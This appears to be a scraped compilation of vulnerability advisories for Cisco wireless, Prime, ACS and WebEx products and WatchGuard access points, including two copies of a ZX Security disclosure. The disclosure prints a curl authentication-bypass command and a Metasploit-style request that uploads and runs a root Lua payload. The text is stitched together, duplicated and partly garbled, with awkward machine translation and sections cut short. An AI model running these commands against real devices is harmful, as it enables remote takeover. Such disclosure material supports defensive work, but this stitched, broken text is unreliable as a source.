A vulnerability in the 802.11 frame validation functionality of the Cisco Wireless LAN Controller (WLC) could allow an unauthenticated, adjacent attacker to cause an affected device to reload unexpectedly, resulting in a denial of service (DoS) condition. The vulnerability is due to incomplete input validation of certain 802.11 management information element frames that an affected device receives from wireless clients. An attacker could exploit this vulnerability by sending a malformed 802.11 management frame to an affected device. A successful exploit could allow the attacker to cause the affected device to reload unexpectedly, resulting in a DoS condition. This vulnerability affects only Cisco Wireless LAN Controllers that are running Cisco Mobility Express Release 8.5.103.0. Cisco Bug IDs: CSCvg07024. Vendors have confirmed this vulnerability Bug ID CSCvg07024 It is released as.Service operation interruption (DoS) There is a possibility of being put into a state. The product provides security policy, intrusion detection and other functions in the wireless LAN. An input validation vulnerability exists in the 802.11 frame verification feature in CiscoWLC that caused the program to fail to perform full input validation

A vulnerability in the REST API of Cisco 5500 and 8500 Series Wireless LAN Controller (WLC) Software could allow an unauthenticated, remote attacker to view system information that under normal circumstances should be prohibited. The vulnerability is due to incomplete input and validation checking mechanisms in the REST API URL request. An attacker could exploit this vulnerability by sending a malicious URL to the REST API. If successful, an exploit could allow the attacker to view sensitive system information. Cisco Bug IDs: CSCvg89442. Vendors have confirmed this vulnerability Bug ID CSCvg89442 It is released as.Information may be obtained. REST API is one of the real-time communication APIs

An issue was discovered on WatchGuard AP100, AP102, and AP200 devices with firmware before 1.2.9.15, and AP300 devices with firmware before 2.0.0.10. File upload functionality allows any users authenticated on the web interface to upload files containing code to the web root, allowing these files to be executed as root. plural WatchGuard The product contains a vulnerability related to unlimited uploads of dangerous types of files.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Introduction ============ Multiple vulnerabilities can be chained together in a number of WatchGuard AP products which result in pre-authenticated remote code execution. The vendor has produced a knowledge-base article[1] and announcement[2] regarding these issues. ZX Security would like to commend the prompt response and resolution of these reported issues by the vendor. Product ======= Several WatchGuard Access Points running firmware before v1.2.9.15 are affected, including: * AP100 * AP102 * AP200 The AP300 is also affected by issues 2, 3 and 4 when running firmware before 2.0.0.10. The latest firmware update resolves these issues. Technical Details ================= 1) Hard-coded credentials ------------------------- CVE-2018-10575 A hard-coded user exists in /etc/passwd. The vendor has requested the specific password and hash be withheld until users can apply the patch. There is no way for a user of the access point to change this password. An attacker who is aware of this password is able to access the device over SSH and pivot network requests through the device, though they may not run commands as the shell is set to /bin/false. 2) Hidden authentication method in web interface allows for authentication bypass --------------------------------------------------------------------------------- CVE-2018-10576 The standard authentication method for accessing the webserver involves submitting an HTML form. This uses a username and password separate from the standard Linux based /etc/passwd authentication. An alternative authentication method was identified from reviewing the source code whereby setting the HTTP headers AUTH_USER and AUTH_PASS, credentials are instead tested against the standard Linux /etc/passwd file. This allows an attacker to use the hardcoded credentials found previously (see 1. Hard-coded credentials) to gain web access to the device. An example command that demonstrates this issue is: curl https://watchguard-ap200/cgi-bin/luci -H "AUTH_USER: admin" -H "AUTH_PASS: [REDACTED]" -k -v This session allows for complete access to the web interface as an administrator. An attacker needs only a serial number (which is displayed to the user when they login to the device through the standard web interface and can be retrieved programmatically) and a valid session. An example request to demonstrate this issue is: res = send_request_cgi({ 'method' => 'POST', 'uri' => "/cgi-bin/luci/;#{stok}/wgupload", 'headers' => { 'AUTH_USER' => 'admin', 'AUTH_PASS' => '[REDACTED]', }, 'cookie' => "#{sysauth}; serial=#{serial}; filename=/www/cgi-bin/payload.luci; md5sum=fail", 'data' => "#!/usr/bin/lua os.execute('touch /code-execution'); }) An attacker can then visit the URL http://watchguard-ap200/cgi-bin/payload.luci to execute this command (or any other command). 4) Change password functionality incorrectly verifies old password ------------------------------------------------------------------ CVE-2018-10578 The change password functionality within the web interface attempts to verify the old password before setting a new one, however, this is done through AJAX. An attacker is able to simply modify the JavaScript to avoid this check or perform the POST request manually. Metasploit Module ================= ZX Security will be releasing a Metasploit module which automates exploitation of this chain of vulnerabilities. This has been delayed till 30 days after the initial patch was made available to ensure users are able to patch their devices. The module and the hard-coded password will be released on May the 14th 2018. Disclosure Timeline =================== Vendor notification: April 04, 2018 Vendor response: April 06, 2018 Firmware update released to public: April 13, 2018 Metasploit module release: May 14, 2018 References ========== [1] https://watchguardsupport.secure.force.com/publicKB?type=KBSecurityIssues&SFDCID=kA62A0000000LIy [2] https://www.watchguard.com/wgrd-blog/new-firmware-available-ap100ap102ap200ap300-security-vulnerability-fixes

A vulnerability in the assignment and management of default user accounts for Secure Shell (SSH) access to Cisco Aironet 1800, 2800, and 3800 Series Access Points that are running Cisco Mobility Express Software could allow an authenticated, remote attacker to gain elevated privileges on an affected access point. The vulnerability exists because the Cisco Mobility Express controller of the affected software configures the default SSH user account for an access point to be the first SSH user account that was created for the Mobility Express controller, if an administrator added user accounts directly to the controller instead of using the default configuration or the SSH username creation wizard. Although the user account has read-only privileges for the Mobility Express controller, the account could have administrative privileges for an associated access point. An attacker who has valid user credentials for an affected controller could exploit this vulnerability by using the default SSH user account to authenticate to an affected access point via SSH. A successful exploit could allow the attacker to log in to the affected access point with administrative privileges and perform arbitrary administrative actions. This vulnerability affects the following Cisco products: Aironet 1800 Series Access Points that are running Cisco Mobility Express Software Releases 8.2.121.0 through 8.5.105.0, Aironet 2800 Series Access Points that are running Cisco Mobility Express Software Releases 8.3.102.0 through 8.5.105.0, Aironet 3800 Series Access Points that are running Cisco Mobility Express Software Releases 8.3.102.0 through 8.5.105.0. Cisco Bug IDs: CSCva68116. Cisco Aironet Access Point Contains vulnerabilities related to certificate and password management. Vendors have confirmed this vulnerability Bug ID CSCva68116 It is released as.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. MobilityExpressSoftware is a set of management control software running on it. Multiple Cisco Products are prone to a remote privilege-escalation vulnerability. A remote attacker can exploit this issue to bypass certain restrictions and gain elevated privileges

An issue was discovered on WatchGuard AP100, AP102, and AP200 devices with firmware before 1.2.9.15, and AP300 devices with firmware before 2.0.0.10. Incorrect validation of the "old password" field in the change password form allows an attacker to bypass validation of this field. plural WatchGuard The product contains an input validation vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. WatchGuardAP100, AP102 and AP200 are different series of indoor wireless access point devices from WatchGuard. A security vulnerability exists in WatchGuardAP100, AP102, AP200, and AP300. Introduction ============ Multiple vulnerabilities can be chained together in a number of WatchGuard AP products which result in pre-authenticated remote code execution. The vendor has produced a knowledge-base article[1] and announcement[2] regarding these issues. ZX Security would like to commend the prompt response and resolution of these reported issues by the vendor. Product ======= Several WatchGuard Access Points running firmware before v1.2.9.15 are affected, including: * AP100 * AP102 * AP200 The AP300 is also affected by issues 2, 3 and 4 when running firmware before 2.0.0.10. The latest firmware update resolves these issues. Technical Details ================= 1) Hard-coded credentials ------------------------- CVE-2018-10575 A hard-coded user exists in /etc/passwd. The vendor has requested the specific password and hash be withheld until users can apply the patch. There is no way for a user of the access point to change this password. An attacker who is aware of this password is able to access the device over SSH and pivot network requests through the device, though they may not run commands as the shell is set to /bin/false. 2) Hidden authentication method in web interface allows for authentication bypass --------------------------------------------------------------------------------- CVE-2018-10576 The standard authentication method for accessing the webserver involves submitting an HTML form. This uses a username and password separate from the standard Linux based /etc/passwd authentication. An alternative authentication method was identified from reviewing the source code whereby setting the HTTP headers AUTH_USER and AUTH_PASS, credentials are instead tested against the standard Linux /etc/passwd file. This allows an attacker to use the hardcoded credentials found previously (see 1. Hard-coded credentials) to gain web access to the device. An example command that demonstrates this issue is: curl https://watchguard-ap200/cgi-bin/luci -H "AUTH_USER: admin" -H "AUTH_PASS: [REDACTED]" -k -v This session allows for complete access to the web interface as an administrator. 3) Hidden "wgupload" functionality allows for file uploads as root and remote code execution -------------------------------------------------------------------------------------------- CVE-2018-10577 Reviewing the code reveals file upload functionality that is not shown to the user via the web interface. An attacker needs only a serial number (which is displayed to the user when they login to the device through the standard web interface and can be retrieved programmatically) and a valid session. An example request to demonstrate this issue is: res = send_request_cgi({ 'method' => 'POST', 'uri' => "/cgi-bin/luci/;#{stok}/wgupload", 'headers' => { 'AUTH_USER' => 'admin', 'AUTH_PASS' => '[REDACTED]', }, 'cookie' => "#{sysauth}; serial=#{serial}; filename=/www/cgi-bin/payload.luci; md5sum=fail", 'data' => "#!/usr/bin/lua os.execute('touch /code-execution'); }) An attacker can then visit the URL http://watchguard-ap200/cgi-bin/payload.luci to execute this command (or any other command). An attacker is able to simply modify the JavaScript to avoid this check or perform the POST request manually. Metasploit Module ================= ZX Security will be releasing a Metasploit module which automates exploitation of this chain of vulnerabilities. This has been delayed till 30 days after the initial patch was made available to ensure users are able to patch their devices. The module and the hard-coded password will be released on May the 14th 2018. Disclosure Timeline =================== Vendor notification: April 04, 2018 Vendor response: April 06, 2018 Firmware update released to public: April 13, 2018 Metasploit module release: May 14, 2018 References ========== [1] https://watchguardsupport.secure.force.com/publicKB?type=KBSecurityIssues&SFDCID=kA62A0000000LIy [2] https://www.watchguard.com/wgrd-blog/new-firmware-available-ap100ap102ap200ap300-security-vulnerability-fixes

A vulnerability in the Cisco Prime File Upload servlet affecting multiple Cisco products could allow a remote attacker to upload arbitrary files to any directory of a vulnerable device (aka Path Traversal) and execute those files. This vulnerability affects the following products: Cisco Prime Data Center Network Manager (DCNM) Version 10.0 and later, and Cisco Prime Infrastructure (PI) All versions. Cisco Bug IDs: CSCvf32411, CSCvf81727. Vendors have confirmed this vulnerability Bug ID CSCvf32411 and CSCvf81727 It is released as.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Multiple Cisco Products are prone to a remote code-execution vulnerability. Successfully exploiting this issue may allow remote attackers to execute arbitrary code. Failed attempts will likely result in denial-of-service conditions. The manager provides multi-protocol management of the network and provides troubleshooting capabilities for switch health and performance

A vulnerability in the ACS Report component of Cisco Secure Access Control System (ACS) could allow an unauthenticated, remote attacker to execute arbitrary commands on an affected system. Commands executed by the attacker are processed at the targeted user's privilege level. The vulnerability is due to insufficient validation of the Action Message Format (AMF) protocol. An attacker could exploit this vulnerability by sending a crafted AMF message that contains malicious code to a targeted user. A successful exploit could allow the attacker to execute arbitrary commands on the ACS device. This vulnerability affects all releases of Cisco Secure ACS prior to Release 5.8 Patch 7. Cisco Bug IDs: CSCve69037. Vendors have confirmed this vulnerability Bug ID CSCve69037 It is released as.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Failed exploits will result in denial-of-service conditions. The system can respectively control network access and network device access through RADIUS and TACACS protocols. ACS Report is one of the system report generation components

A vulnerability in the Cisco WebEx Network Recording Player for Advanced Recording Format (ARF) files could allow an unauthenticated, remote attacker to execute arbitrary code on the system of a targeted user. An attacker could exploit this vulnerability by sending the user a link or email attachment with a malicious ARF file and persuading the user to follow the link or open the file. Successful exploitation could allow the attacker to execute arbitrary code on the user's system. This vulnerability affects Cisco WebEx Business Suite meeting sites, Cisco WebEx Meetings sites, Cisco WebEx Meetings Server, and Cisco WebEx ARF players. The following client builds of Cisco WebEx Business Suite (WBS31 and WBS32), Cisco WebEx Meetings, and Cisco WebEx Meetings Server are affected: Cisco WebEx Business Suite (WBS31) client builds prior to T31.23.4, Cisco WebEx Business Suite (WBS32) client builds prior to T32.12, Cisco WebEx Meetings with client builds prior to T32.12, Cisco WebEx Meeting Server builds prior to 3.0 Patch 1. Cisco Bug IDs: CSCvh85410, CSCvh85430, CSCvh85440, CSCvh85442, CSCvh85453, CSCvh85457. plural Cisco The product contains an input validation vulnerability. Vendors have confirmed this vulnerability Bug ID CSCvh85410 , CSCvh85430 , CSCvh85440 , CSCvh85442 , CSCvh85453 ,and CSCvh85457 It is released as.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. WebEx ARF player is one of the players, which is mainly used to play WebEx recording files in ARF format